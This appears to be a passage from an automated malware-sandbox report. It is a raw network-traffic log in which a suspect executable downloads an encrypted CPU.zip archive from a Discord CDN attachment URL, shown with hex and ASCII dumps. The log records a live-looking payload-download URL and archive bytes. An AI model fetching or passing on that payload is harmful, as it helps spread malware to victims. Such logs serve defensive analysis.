                                                                  2022-07-15 01:58:15 UTC776INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 4d 4d 24 a1 60 32 f6 e1 9a 47 ff eb a2 43 ff e8 9f 43 ff e8 9f 43 ff e8 9e 43 ff e8 9e 43 ff e8 9d 43 ff e8 9d 43 ff e8 9d 43 ff e8 9c 42 ff e8 9c 42 ff e8 9b 42 ff e8 9b 42 ff e8 9b 42 ff e7 9a 42 ff e7 9a 42 ff ea 9a 3e ff d5 8f 40 ff e6 d8 ce ff f7 f1 f0 ff f4 ea e5 ff f4 eb e7 ff f8 ee e8 ff da 9d 5e ff e2 cd bb ff f8 f1 f0 ff f4 ea e4 ff f4 ea e5 ff fa f1 eb ff e2 a6 64 ff 68 58 ca ff 50 58 ff ff 55 57 ff ff 4e 50 ff ff 52 59 ff ff c0 87 81 ff ff 9f 38 ff d0 8a 49 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff d4 94 0c f0 a5 4b 11 f2 a5 59 14 ea b7 70 19 ee bb 7f
                                                                  Data Ascii: MM$`2GCCCCCCCCBBBBBBB>@^dhXPXUWNPRY8IKYp
                                                                  2022-07-15 01:58:15 UTC792INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c6 84 43 90 ec 8d 3f ff c9 a7 8e ff f6 ff ff ff fd ff ff ff f9 fd ff ff f8 fb fe ff f6 fa fc ff f5 f8 fb ff f3 f6 f9 ff f1 f5 f7 ff f0 f3 f6 ff ee f2 f4 ff ec f0 f2 ff ea ee f1 ff e9 ed f0 ff ea ef f1 ff df e9 ee ff d5 a2 82 ff dd 6c 2a e4 bf 7f 5f 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 72 4c 33 14 ca 78 3d f1 d7 86 45 ff d3 ce cb ff f6 f8 f9 ff f1 f1 f1 ff ef ef ef ff ee ee ee ff ec ec ec ff ea ea eb ff e9 e9 e9 ff e7 e7 e7 ff e7 e7 e7 ff e7 e7 e7 ff e7 e7 e7 ff e8 e8 e8 ff e9 e9 e9 ff ed ef f1 ff d4 d0 cd ff eb 86 48
                                                                  Data Ascii: C?l*_rL3x=EH
                                                                  2022-07-15 01:58:15 UTC808INData Raw: 52 46 1d da c5 05 41 f6 0e 19 dd c1 e6 dc 9d 80 63 43 5a 64 f3 fb 09 8b 62 77 13 8e 48 2b ee 6e 0d b1 37 88 37 c7 dd 4d e1 7a 03 8f a4 8b 9f c1 c8 5e b5 ad ad e1 65 75 6d 36 e8 9d 7c 44 e2 e4 32 48 b3 df 59 71 9a 72 87 41 b5 3f 2c bf 82 f0 01 84 39 81 cb 69 ea 1e 65 70 42 8b 42 3a 28 73 33 e9 67 b6 dd c9 b9 9a 74 c4 fc 92 f2 7b 6b b8 07 97 d2 cd 65 c2 61 c5 1b a1 b3 73 d9 58 0e c9 b8 ea 38 fd ba 9c 49 91 41 e0 c8 e2 7d aa 9f 8c 18 d0 ce 64 f0 7c 67 dd 37 15 8a 87 e8 82 26 8e ca c5 af 6a 9d 24 21 1d c1 45 03 38 ae a5 b1 e1 bb c4 8e 59 bd 68 43 1d 18 9a 5b 72 bc 85 d6 0f 2d 4c 71 a5 03 9d 3a 68 60 b6 0c 06 d0 06 bc 1b d4 6c b0 cf bb 37 51 0e ca 1c ae ff ff ac 2a 61 ea b6 22 27 77 a7 ef 5d b4 71 2a 20 a6 3c e3 ba 73 5b 48 b9 4a 76 30 12 80 2b db 98 d1 f8 b7
                                                                  Data Ascii: RFAcCZdbwH+n77Mz^eum6|D2HYqrA?,9iepBB:(s3gt{keasX8IA}d|g7&j$!E8YhC[r-Lq:h`l7Q*a"'w]q* <s[HJv0+
                                                                  2022-07-15 01:58:15 UTC824INData Raw: c3 c8 28 8c 12 c5 a7 6a 6c da 59 f9 68 ef c7 a0 c4 7a 33 d0 c1 7a f4 b6 d6 2b 1e 8d ae e6 45 6e 04 a7 bd 39 0c 4c ca 7c 5e 14 66 19 33 49 05 60 f3 9f cc fd b6 f9 74 73 58 24 a8 5e 6c 19 7f 51 e0 14 b2 1c d8 f1 a1 54 dd 36 33 39 89 de e5 fe 29 05 e1 1e 4b ce d9 00 33 15 eb 2e 4e 06 70 93 af e7 f8 ee 53 ac 80 b0 18 50 a8 71 68 7a a3 e7 5d 2b 77 64 db 6b d8 66 94 63 11 ec 40 e7 e0 8d b3 94 04 4f 4f 8a dc 43 55 91 c3 ca 4f 67 b6 aa 5e 31 a1 33 96 11 71 ee f1 f5 72 d5 2e 6e 69 bd b7 26 e5 d0 29 b2 e7 d3 e9 0e 43 38 e9 de 19 5e 64 ec bb 3d 31 4d d9 ec 9c 2b 51 cd f3 77 81 3b 35 00 40 85 5e 94 19 38 03 3e cf a1 02 a8 77 4f 05 bc ff 96 1d b9 67 b4 dd 2a 9a 20 d9 28 1f c2 24 cf c5 6b f4 aa 3f 25 6d 70 c9 2a 5d ca 27 5e 8d e6 43 fd 4d 7d 05 b9 5a 6a 91 51 9f 7d f6
                                                                  Data Ascii: (jlYhz3z+En9L|^f3I`tsX$^lQT639)K3.NpSPqhz]+wdkfc@OOCUOg^13qr.ni&)C8^d=1M+Qw;5@^8>wOg* ($k?%mp*]'^CM}ZjQ}
                                                                  2022-07-15 01:58:15 UTC840INData Raw: 14 0e ba 32 80 b5 33 10 e3 af 54 04 33 e4 14 1f d6 9d 63 0f 1b ff 52 fb c6 bc fd 16 44 23 13 9b c5 de d3 e9 c6 a6 c0 4f 08 8e 24 5a ac 1e ab 9c 75 80 63 56 ab 2c 96 82 e6 6e 06 d1 64 11 79 5b 9c dc 4d e7 e7 c4 5b 12 6a b6 a8 ff 04 4a 1b 78 ed ff 2f 36 22 8c aa 19 11 ab 49 d4 43 d9 45 a9 07 ff 17 b5 11 77 31 20 3e ae 95 bb 3d 26 d6 d9 47 28 42 a2 65 36 27 a0 43 a1 34 8c ee 0b 4a cd 2a ee 3e f6 9b 4f 3d f3 dd 29 da c9 e7 ea db 67 7b ab e1 bc bf a7 f5 ea 09 f1 aa ee a1 e1 dc ae f0 cc 3f 10 10 4a 70 52 af 6f 34 65 94 58 3e 87 51 b7 01 8f 1e 42 43 1d fb 83 fc 20 79 73 fe 1b cd 6a 4b 06 89 de 04 da 2e 33 83 12 08 57 02 3a 0b 11 67 cf ad 1f db c8 ee dc c5 f7 b3 92 ee e4 82 61 7a f4 0f 74 12 5f 0e 62 5b 6d b8 64 e3 71 d3 03 bb 52 9a 0d e0 08 01 12 77 f6 08 66 29
                                                                  Data Ascii: 23T3cRD#O$ZucV,ndy[M[jJx/6"ICEw1 >=&G(Be6'C4J*>O=)g{?JpRo4eX>QBC ysjK.3W:gazt_b[mdqRwf)
                                                                  2022-07-15 01:58:15 UTC856INData Raw: 58 34 cd af d0 c7 f7 3c f2 4e 8a 78 f5 5b 05 0b f1 5e 81 0c ed ed 4f 94 22 f0 c8 44 5b d4 cb 23 f1 e2 eb 18 aa 78 0c 62 dd c9 1e 25 99 2c e2 e1 ae ad eb be 7e 9e a0 50 23 db 49 f0 0b 58 83 3a 6a b4 b0 b2 48 d1 fa 79 e4 29 67 2e a3 4d de fd 6c b1 f9 c3 24 49 5e 89 00 28 0a 50 c2 39 b4 83 e4 d6 64 4a b7 36 2b ff 8c 81 e6 97 54 ba bc fb 7e f3 a7 cf 5d dd 70 4e 4d 99 e3 fd 1c 52 02 ea 40 d5 b3 89 02 c7 c6 7c 71 0d a0 78 e4 ac 79 d3 b6 a9 1c 91 5e eb f2 a9 d0 b0 d4 2f c1 0a b6 7f ea c3 a6 a7 c5 1f 45 ab 06 5f ca 72 3d 1b af e9 29 3c 49 91 4a e8 3c b0 54 6c 9c c0 bf cc 48 b9 20 1b f2 5a 20 5d 7b 08 1a ee 6d 1b 33 cb 44 93 25 47 5c 25 86 c5 0d c0 7c 99 a6 41 b9 08 26 b9 ee c7 fe 1c 43 01 ec b6 08 4e 7d a0 f0 76 bc 25 c1 b7 c9 74 4f 87 4a e4 c9 e4 dd 2b d2 74 0d
                                                                  Data Ascii: X4<Nx[^O"D[#xb%,~P#IX:jHy)g.Ml$I^(P9dJ6+T~]pNMR@|qxy^/E_r=)<IJ<TlH Z ]{m3D%G\%|A&CN}v%tOJ+t
                                                                  2022-07-15 01:58:15 UTC872INData Raw: c1 0c 24 3e af d2 09 57 a4 92 e4 68 fd a7 6a a3 15 22 50 e2 6a 59 ef fb 62 ea 84 71 93 aa e4 6b 74 e5 9a 3e c8 46 61 79 1b 97 98 6e db af e8 e8 08 46 fd c3 34 97 fc 98 65 ef 5b 93 7c 6f 64 eb aa 2e 8f 5c 04 61 03 47 2e ed 7e e6 64 80 d9 7f 06 14 96 08 ac 31 7a d2 3b e2 99 b2 ba c0 74 28 89 9c 5c f8 72 55 d3 83 2a 6d c1 7e 21 29 34 06 1c aa a7 96 46 38 38 0b 34 c9 10 9d a7 97 dd ca f2 8a 0e 78 de 05 bc 1e 47 83 20 ac ca 6a dd 22 4e 17 a8 38 f9 60 b9 88 67 b1 94 86 cc 2b ec 67 2e 4e a0 d7 e2 b2 37 2d ac 3d b5 c9 7c 97 2a 00 fe 3e 71 0d 03 72 f8 cd fa 03 6b c0 67 02 b4 a0 fe bb 94 30 83 d7 65 44 83 03 43 4b fb 3e 65 88 62 9a 97 86 2d bc 48 a8 b8 c2 d8 89 b7 e3 1b 83 23 63 58 d1 f4 05 97 1e c0 fa e7 e8 07 0f eb 9e cd 58 2e eb 4e 8e 2b 02 b2 11 9d c0 98 bc fd
                                                                  Data Ascii: $>Whj"PjYbqkt>FaynF4e[|od.\aG.~d1z;t(\rU*m~!)4F884xG j"N8`g+g.N7-=|*>qrkg0eDCK>eb-H#cXX.N+
                                                                  2022-07-15 01:58:15 UTC888INData Raw: bd af e8 97 e0 77 5f bd cc 49 39 3e 6e 23 e7 86 fb 99 58 b9 e3 2d 44 bb 30 ba 34 89 07 48 eb 47 e8 37 e4 16 c7 0e 87 76 e9 98 80 22 4c 5f 41 72 79 c9 4c 38 89 ce 59 de 0b 21 1e 30 2b 58 08 86 b8 30 1d cb d5 f8 25 66 78 91 b8 cb d8 c2 7d 7c d3 a0 7e dc 6c d2 3d b5 3b 5b 41 00 96 03 bc 18 0b eb 45 04 5e bd f6 7d 3b 8d 2d 70 3d 1c 5c 05 e6 c5 9d d5 e7 04 7d 09 96 ae 9a a5 a9 19 5a e2 6d 91 20 6c 68 0d 26 a2 f7 99 8e 10 20 c4 e4 ca 3b d2 eb 72 82 fb 5f 2d 15 cf 7b 5e c6 6b e8 59 e3 1d 4f 97 6b 08 84 e3 cc a3 53 a4 2b 9f 6f 16 f6 86 65 67 94 83 92 14 22 d2 c3 16 d0 f4 df 43 0c a6 0d 37 48 f2 25 d3 95 5a c7 86 93 08 5b 83 6b d9 c8 b3 d7 8a f7 9f 73 8d 99 ca 3a 58 0f 52 6d 79 1b 07 a3 07 f1 e6 c2 3d 0e 06 82 f3 58 9f f1 b7 5f a2 9f 22 16 11 ce 62 ef 74 8f d5 60
                                                                  Data Ascii: w_I9>n#X-D04HG7v"L_AryL8Y!0+X0%fx}|~l=;[AE^};-p=\}Zm lh& ;r_-{^kYOkS+oeg"C7H%Z[ks:XRmy=X_"bt`
                                                                  2022-07-15 01:58:15 UTC904INData Raw: 92 31 eb 3a 3e 84 d6 a6 89 c2 e0 5a f3 61 dd 32 ed 27 8c 45 3c d3 cc 79 10 ce bc 55 67 52 9f e8 5e 15 22 c1 e9 74 09 b7 7d ed ca 28 7c 63 15 56 f8 c0 b3 a8 9b ad 2a 01 52 d0 ae 87 63 c7 1f 2d 26 bd a9 87 a4 ed 18 86 ed a6 99 5f 13 92 f8 40 a8 06 fc 49 94 b7 bf bc 6c d9 37 3f 56 d1 5b 95 86 45 4e f4 7b f3 9f c3 ad dd 1b 49 65 91 13 79 19 8e 37 f6 10 b2 bf 41 6e 64 0a 07 96 5e 1b 6c 9c 4d 3b f2 1c 48 76 80 37 ec 70 b2 d1 a7 4f fc 38 f2 5f 9a 14 e2 b0 ee d8 3a bb 6c d1 59 7e 03 f0 2b 77 2b db de ed 4e 8b a7 1c 25 16 f6 c6 ed 00 a9 85 1c 0a 96 85 01 29 f2 ee e7 54 4a 88 b4 46 a7 41 3a 45 7c 80 d6 97 c0 d6 01 02 30 a4 7e 58 ed 93 53 d0 59 62 2a 22 7b ba d2 75 42 91 32 25 b0 de b0 c1 7e 46 f5 31 86 9a 2a 50 4b 57 35 ce 95 a1 93 fc 57 f9 28 7b 04 2a 8a 37 88 99
                                                                  Data Ascii: 1:>Za2'E<yUgR^"t}(|cV*Rc-&_@Il7?V[EN{Iey7And^lM;Hv7pO8_:lY~+w+N%)TJFA:E|0~XSYb*"{uB2%~F1*PKW5W({*7
                                                                  2022-07-15 01:58:15 UTC920INData Raw: 9d 04 5f 24 cb 2e 4b e1 60 82 46 e1 52 ab 0c 81 47 70 6c dd 64 d1 eb f5 2c a3 0f 82 3d 0c 2b ae 97 d7 b6 14 86 10 79 bb 3b 13 80 77 8c 08 e1 49 d2 6a 62 2f 1f 5e fa 96 68 df 89 27 95 38 9f 06 d7 3e c9 cb 26 59 0d 73 de b0 c8 e9 26 0e 83 15 c6 ef 5b 8b d2 04 60 ca 49 a6 28 f6 69 3b f6 cb c8 28 91 e5 9d 8a 61 57 37 ac 74 14 dc 74 e0 3a ee 72 2f 2e 9c fb d0 bb bf f5 3d 00 e1 06 33 e8 82 2b ae 53 a6 3a 16 73 8c dd 41 0e 20 3a c0 b4 a7 a1 e9 b2 4f 90 2e 32 60 e9 57 cb b9 04 92 68 68 e5 38 26 60 75 b2 9f 77 ff 91 14 ef ae 20 49 fc ad 40 15 48 d1 02 31 61 19 5e b8 97 ef ad 77 b7 64 9a 7a bf 5f c1 13 ef 9b 62 fb 0d 6c e0 54 69 16 a9 03 da 6e e9 83 93 71 76 c6 69 85 82 17 02 03 01 00 01 a3 42 30 40 30 0e 06 03 55 1d 0f 01 01 ff 04 04 03 02 01 06 30 0f 06 03 55 1d
                                                                  Data Ascii: _$.K`FRGpld,=+y;wIjb/^h'8>&Ys&[`I(i;(aW7tt:r/.=3+S:sA :O.2`Whh8&`uw I@H1a^wdz_blTinqviB0@0U0U


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  3192.168.2.649762162.159.129.233443C:\Users\user\Desktop\bQQHP9ciRL.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-07-15 01:58:20 UTC927OUTGET /attachments/871345933034606592/995412381125574716/CPU.zip HTTP/1.1
                                                                  Accept: */*
                                                                  UA-CPU: AMD64
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                  Host: cdn.discordapp.com
                                                                  Connection: Keep-Alive
                                                                  2022-07-15 01:58:20 UTC927INHTTP/1.1 200 OK
                                                                  Date: Fri, 15 Jul 2022 01:58:20 GMT
                                                                  Content-Type: application/zip
                                                                  Content-Length: 3420282
                                                                  Connection: close
                                                                  CF-Ray: 72aee47a6d129b80-FRA
                                                                  Accept-Ranges: bytes
                                                                  Age: 70582
                                                                  Cache-Control: public, max-age=31536000
                                                                  Content-Disposition: attachment;%20filename=CPU.zip
                                                                  ETag: "60e8a0a1934a8df1e218bbd6f4893561"
                                                                  Expires: Sat, 15 Jul 2023 01:58:20 GMT
                                                                  Last-Modified: Sat, 09 Jul 2022 19:33:25 GMT
                                                                  Vary: Accept-Encoding
                                                                  CF-Cache-Status: HIT
                                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                  x-goog-generation: 1657395205619825
                                                                  x-goog-hash: crc32c=XVfN2g==
                                                                  x-goog-hash: md5=YOigoZNKjfHiGLvW9Ik1YQ==
                                                                  x-goog-metageneration: 1
                                                                  x-goog-storage-class: STANDARD
                                                                  x-goog-stored-content-encoding: identity
                                                                  x-goog-stored-content-length: 3420282
                                                                  X-GUploader-UploadID: ADPycdu8EBkLAWEbosUYVMB4jMS-LpNEbKZC1h8M80tydjSu8EZJK63nHxRgc9bzSHWdbj1I4OV71668Ctg4IJGCez1Mcw
                                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F%2BXHRogUksWcVVgRUmbZ7mM68NB2NlbYqkWrV%2BQB9p6sj5BgDRTLGc78c5UJG7tcvPX5%2BIYB7xP1fGJUqORXGiYsQeeNnc%2Fq8znFgKEZeIm5Nnnx2aGTvnkgf0DBoQqOXYZkHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  2022-07-15 01:58:20 UTC928INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                  Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                  2022-07-15 01:58:20 UTC928INData Raw: 50 4b 03 04 14 00 09 00 63 00 ca 1b ea 54 a5 50 90 08 a3 00 00 00 8c 00 00 00 0a 00 0b 00 63 6f 6e 66 69 67 2e 74 78 74 01 99 07 00 01 00 41 45 03 08 00 81 3f 91 45 c6 de ce 1d 31 4c 53 65 b5 50 af 5f 31 ac 2e 95 e8 ec 84 12 36 ad 60 ec fd b7 29 a4 10 27 10 0b cf 35 ec ce 0b f4 80 e8 9b ff c3 ef 63 0f 98 8f 19 75 28 4d 77 c3 93 11 4d bd 13 3b 9a 93 34 95 cd 21 7f ec be 3c 70 43 57 90 ee 6c de 64 1a 9e cc 38 dd e7 d2 e6 6d 67 c3 ce 4c f2 92 4a 91 7f cc 2c 41 79 57 06 1a bc 23 f5 ec 25 6e 98 82 b8 90 8d 1f 34 f0 bf 11 c9 42 a5 42 ec 0f ed 0b be 9f 8a 8e 74 68 b9 dc 92 b4 e1 df c4 13 d0 1e b7 80 80 e8 6f 68 a3 c9 02 f4 76 1b 2a fa 9d 32 50 4b 07 08 a5 50 90 08 a3 00 00 00 8c 00 00 00 50 4b 03 04 14 00 09 00 63 00 96 b8 85 54 5f 07 e0 1c d7 2c 34 00 00 96 7e
                                                                  Data Ascii: PKcTPconfig.txtAE?E1LSeP_1.6`)'5cu(MwM;4!<pCWld8mgLJ,AyW#%n4BBthohv*2PKPPKcT_,4~
                                                                  2022-07-15 01:58:20 UTC930INData Raw: dd ed 48 9d b6 f0 bf 7b 05 67 e6 88 50 40 be ce 3b 42 3c 2d 8f 35 64 6f b3 37 d2 2b b4 ce ce 28 82 74 0f 35 8e 1b 2f 7f a7 8d e8 5e 83 6b e2 be 45 c1 d6 ee 8b d2 f5 d1 a1 71 5a 80 ec 41 f2 0a ba 03 20 19 e5 29 07 66 76 9a 38 24 ed b2 a5 59 da ff 7d 1f ea 44 da 07 db 30 c0 a7 36 01 97 da 8d 0d ab 9f 64 cb 82 34 0a 2c bc 62 86 64 7a c5 03 98 3c 62 0f c9 50 f3 ed 5a 8a df 0d 60 d7 7f ff 1c 1d bd 61 90 57 3d 13 25 74 a3 8d df 2e e8 d3 b4 f3 96 a7 72 2b 84 a5 f6 54 bd 45 87 54 22 61 4a 64 70 7a 36 45 b8 4f e8 95 f3 84 b0 73 58 6a 0d d2 68 2c 7d b3 b0 c1 37 c3 0d 84 6a c1 3d 09 9e ad 74 fc 37 00 08 ed df 04 a6 6f b9 ab ec 40 01 a4 6f b6 d6 e1 3d 4c 31 b5 73 03 93 5a 43 7d df 33 b8 07 76 24 37 67 f6 7f b1 5d d4 26 ff a7 be 51 3a b8 5b a7 99 ca 34 8f b8 86 2f b1
                                                                  Data Ascii: H{gP@;B<-5do7+(t5/^kEqZA )fv8$Y}D06d4,bdz<bPZ`aW=%t.r+TET"aJdpz6EOsXjh,}7j=t7o@o=L1sZC}3v$7g]&Q:[4/
                                                                  2022-07-15 01:58:20 UTC931INData Raw: 5c d0 9a 4d 82 79 1a e8 ad bd ff 04 b3 71 d6 e7 97 07 ad e5 23 a3 5d ce 05 6b f2 21 43 57 ec e2 ba 04 7c d4 d5 a4 cf 59 07 c3 c2 6d 4f 95 a1 0e ae 8c c8 86 e1 99 ad 9b 78 64 7b e5 22 cf 89 df d4 22 76 4a ee a3 fc ad 7d ca 40 f3 05 c8 b0 84 8d 54 bd 79 3d 40 36 7f 33 bf 3a c5 7a e5 44 13 3b 81 3a 94 04 27 10 4d d9 0e 28 d0 cf b3 f8 92 b7 d8 b0 ce 95 ad f2 c2 6f 2d 26 8c f8 a1 03 97 b1 b3 50 80 f5 18 d3 7b 2a 0c 20 19 d9 53 56 be 1f f0 a8 9d 8c 5d 88 f2 73 2e 19 b3 f0 70 70 83 73 7d 7d 7f 5d dd 40 ec 75 82 30 5c 98 94 b4 75 ef d0 03 59 fa 44 3f 84 bf b4 22 93 2c 0b c2 98 4a 33 ed 2f 7b 9d 72 4e 3f 68 32 c4 d1 b3 18 b6 c3 43 1d 84 c8 cf 84 cc 8b be 9c 9b ec 18 3b 22 48 49 17 ad 43 9e f9 b5 cc ef d3 64 74 d6 6f f3 fe 9d 15 e0 51 a7 1b 82 1c 76 04 48 df bd df
                                                                  Data Ascii: \Myq#]k!CW|YmOxd{""vJ}@Ty=@63:zD;:'M(o-&P{* SV]s.pps}}]@u0\uYD?",J3/{rN?h2C;"HICdtoQvH
                                                                  2022-07-15 01:58:20 UTC932INData Raw: 1a 9c a6 2c 5d 78 ba 9c 99 1a 88 7d a1 a4 52 53 98 6e af 76 13 88 4e 3f f6 8f a3 a6 61 db 7e 5d 99 33 45 ab 92 8e 15 b8 c9 c4 7f cc 14 de 9b 17 3a 77 d8 46 25 d2 33 f9 49 89 2f ba 67 75 21 a2 31 33 af 8c 18 a8 3e 52 9f 1d 89 29 eb 37 4c f2 21 aa cc 07 6c 96 4e bd 25 0f 59 22 29 4b 9f 60 06 26 ef d5 79 9c ba 6b cc 67 24 7b cd 2b 4a aa 55 53 22 29 63 04 9b 7f eb 70 26 ea cd 46 f9 2c 77 f6 d7 40 26 0e 32 1a 89 1e 89 30 95 16 b1 77 06 83 a0 60 0a 56 a3 97 55 04 9b a4 b4 e4 a9 89 70 4d 75 9b fa 4c 4c e1 e3 ce c3 21 1c 65 6f 41 ce 42 4c 97 a7 27 42 6b 33 7f b5 d6 b0 22 5b 78 b2 0c b6 12 b4 95 1e de e8 30 f6 45 5a 6e 2c 2c bb 7d a6 26 34 e2 f4 39 e2 f4 23 01 e4 37 92 08 fe 18 71 05 b6 76 14 dc 41 67 87 0d 24 85 f4 98 11 e3 a8 b6 62 49 b6 37 c6 f9 df 5e 88 62 9e
                                                                  Data Ascii: ,]x}RSnvN?a~]3E:wF%3I/gu!13>R)7L!lN%Y")K`&ykg${+JUS")cp&F,w@&20w`VUpMuLL!eoABL'Bk3"[x0EZn,,}&49#7qvAg$bI7^b
                                                                  2022-07-15 01:58:20 UTC934INData Raw: a2 51 a2 45 fe 6e 3f ac a8 dd 58 44 5b 5b 1b 51 50 12 4a a7 6f bd b8 a2 12 56 ce b3 93 39 4e aa 03 68 59 74 5e 2f 73 3f 06 13 f7 7e a8 d9 0b 6e aa 1e e2 7a 7c 80 6f a0 da 3b e8 a0 7f 9a 4a 0c 4d 05 ec 61 80 3e 05 56 e1 09 63 fe 47 7d 17 db f0 fd 98 4f 9a 12 b5 db dd 37 9a e0 1d 62 d0 2d 0b c1 4b 7f 96 11 b1 e9 4d 5e 8d 0f 0d 9e 8b e6 15 51 fd 4a bb ef 0d 60 f7 20 40 8f fc 85 79 cb 26 20 56 41 17 4f f3 2a 39 f7 71 20 46 b4 da 13 5f b1 31 34 47 45 13 bf 44 d9 af 58 70 bc 5d f1 7d 82 f2 3a 43 53 e9 ff 5e 87 01 47 b3 36 72 12 22 38 05 f9 e7 70 63 bb 64 d2 cf 0d cd 0b ec db 99 60 5e 8f 88 b2 9b 07 77 ca b1 c9 a9 d3 0d 55 53 e6 15 cf 01 0b 19 d9 52 40 f3 04 d4 9c 57 dc fd 76 f5 5e 8f dc 46 4b 43 dc c8 24 8f df b6 ac fd 6c 89 1e 1f 30 af 1b 5f 54 8d 1e 73 bb e4
                                                                  Data Ascii: QEn?XD[[QPJoV9NhYt^/s?~nz|o;JMa>VcG}O7b-KM^QJ` @y& VAO*9q F_14GEDXp]}:CS^G6r"8pcd`^wUSR@Wv^FKC$l0_Ts
                                                                  2022-07-15 01:58:20 UTC935INData Raw: 77 51 75 17 50 42 96 f2 0b c4 92 b6 89 fc 4c d6 01 3f 30 1b 30 aa b7 b3 29 af 84 b0 ad 2f b7 d2 cb 06 92 a6 93 d1 41 66 29 e1 f3 05 21 c1 7b 31 e7 5b be f4 54 b8 b0 87 a7 d5 5a 1b 7f 77 ea 59 88 04 b7 6c a7 e2 6a 58 29 cb ed 70 d9 a3 bd 88 ed 60 e3 12 10 34 42 84 c1 da fd c7 4e f0 fd 8c bc 72 7b a6 be 93 77 75 dc 2a 80 3f 2c e0 a9 d3 80 b4 42 ac 56 f5 1a 13 a5 3a 73 f3 8c 4d a3 2a 61 13 32 d7 5b 26 1d e8 3c b9 19 f4 66 19 85 0c e8 88 e3 bb 85 03 63 48 33 1a 7b 8b a8 cb 85 14 5d 3f c1 f4 a2 6d f9 2d 6f 33 e7 20 01 58 cd 1d b1 64 d0 9d 54 65 a8 69 4c 6e 0a e1 ac be 83 c8 54 df cc bd bb 0b 1c 24 2a 00 b4 e9 30 11 ef 15 ae 3c 84 78 94 b2 3e 9b c8 22 90 ee 7c 37 c6 fa bf bd 6e 09 db 85 94 e3 c4 c3 5b 32 80 b5 f7 f3 5e e7 1d d3 59 78 6f 33 d4 e0 21 70 13 47 68
                                                                  Data Ascii: wQuPBL?00)/Af)!{1[TZwYljX)p`4BNr{wu*?,BV:sM*a2[&<fcH3{]?m-o3 XdTeiLnT$*0<x>"|7n[2^Yxo3!pGh
                                                                  2022-07-15 01:58:20 UTC936INData Raw: 4a 8a 70 c9 52 76 0c e5 25 92 78 71 15 dd e1 6e 04 97 19 2f f0 62 e1 5b b5 0a 9c cc c7 f6 d8 d6 87 9d e6 7d 84 e5 00 32 6b 9e 2b 0e 35 bd e6 6a b9 72 4f 78 7f aa 4e 80 e4 bd a8 0b b8 b4 8c 01 0a b6 79 b7 5f 7d 7b 9d a8 98 61 57 91 11 0b bd bf 4d ed 5f ca a3 2f 57 0a a1 17 d2 11 15 cc 94 b9 98 6d 96 58 f7 fb cd 08 fa 12 7b f2 d0 58 92 2a d5 44 d8 52 b8 30 d8 03 fc d2 62 50 b8 b7 7e 33 28 9d 67 75 8a dd 0f 55 11 c8 8e 1b 28 d6 ea 62 67 93 c0 5b 49 36 4c 9e af 2e dd 22 59 2f 39 90 c6 d8 41 dd 27 72 1f ac e2 76 c4 34 2a 9b 34 82 1d 53 04 b4 1b 98 88 04 f9 23 e2 d8 81 12 36 7e 03 f8 39 12 37 42 49 1f f5 d0 a2 f1 f4 ac 2b ee 8f fd 1b 16 48 3d ec a9 a2 4c d9 6a 69 f0 0c 3e 62 92 4c 12 4b 9f 68 e3 eb 7d 74 9e 06 e5 72 6c d6 89 6b 04 8e c0 da c4 1d ae dc b6 62 13
                                                                  Data Ascii: JpRv%xqn/b[}2k+5jrOxNy_}{aWM_/WmX{X*DR0bP~3(guU(bg[I6L."Y/9A'rv4*4S#6~97BI+H=Lji>bLKh}trlkb
                                                                  2022-07-15 01:58:20 UTC938INData Raw: e2 34 1a 2c e1 c4 76 d4 84 9b e4 a7 74 3b 8d 17 c5 28 7b 8a da 4f 98 52 cd 86 8a 85 92 ed f8 27 38 47 19 11 67 6f f9 f2 51 5a 47 85 82 e3 c5 65 b9 09 76 6f e5 e1 c2 2c a3 ea d5 a1 bb fd c1 5f b5 ab 99 eb 8b 72 5e 86 19 d2 ca e0 75 fd 14 aa 1b 7d 65 42 8b c2 d6 4b 6d ed e5 91 c8 67 45 93 06 b7 ce 58 12 2e 18 b9 da f7 59 00 5f f6 90 8e cc c1 a9 d7 40 83 c6 d8 c7 69 3c 53 0a b0 a8 4f fa 7d 70 0b 9f 84 cb 72 57 6d 93 e7 bb 60 62 d5 83 c5 7e 8b 04 e8 50 e9 1e 3d 30 58 c8 c9 31 ed 7a f0 63 27 02 e9 7d 6b 21 e6 d0 40 22 c7 ae fa 24 3d 5b 6e c0 5c 17 5d c3 6b 5b 57 a7 5b 9a dc 97 d1 17 92 77 13 7b c8 ab 8b 28 fd 55 b7 69 59 44 30 7d 85 99 be 72 1a e0 ea 4b 5a be 67 f5 c1 76 d5 78 e4 f1 92 0a d1 cc f1 3c 4b 32 34 13 0e 13 6b 83 69 88 7e 87 eb e6 8f cb 0c 40 56 1f
